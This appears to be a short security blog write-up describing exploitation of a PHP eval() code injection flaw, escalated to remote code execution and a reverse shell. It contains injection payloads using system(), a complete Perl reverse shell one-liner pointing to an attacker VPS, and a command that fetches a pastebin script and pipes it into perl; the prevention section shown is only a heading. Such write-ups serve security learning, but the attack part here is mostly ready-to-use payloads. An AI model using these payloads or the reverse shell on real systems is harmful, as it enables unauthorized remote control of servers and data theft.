RCE By Code Injection | Perl Reverse Shell

what is php code injection weakness ?

Background story

print("AbdulrahmanKamel0xx")
no reflacted string
;print("AbdulrahmanKamel0xx") 
‘.print("AbdulrahmanKamel0xx").’
BOOM!
Remote Code Execution

The expected backend code:

<?php
$input = $_REQUEST['local'];
eval('$input');
?>
'.system("command").'
================================
<?php
$input = $_REQUEST['local'];
eval(''.$input.'');
?>

Getting Reverse Shell

'.system("nc -v").'
not reflected any data mean not performing the command
found Perl v5.20
funny meme ^_^
perl -e 'use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
request syntax error because [&] sign
'.system("curl -v").'
use Socket;$i="<my-vps-ip>";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
curl https://pastebin.com/raw/EEaH**** | perl
...
'.system("curl https://pastebin.com/raw/EEaH**** | perl").'
Reverse Shell via Perl

Prevent PHP code injection

Stay in touch

--

--

Cyber Security Engineer

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store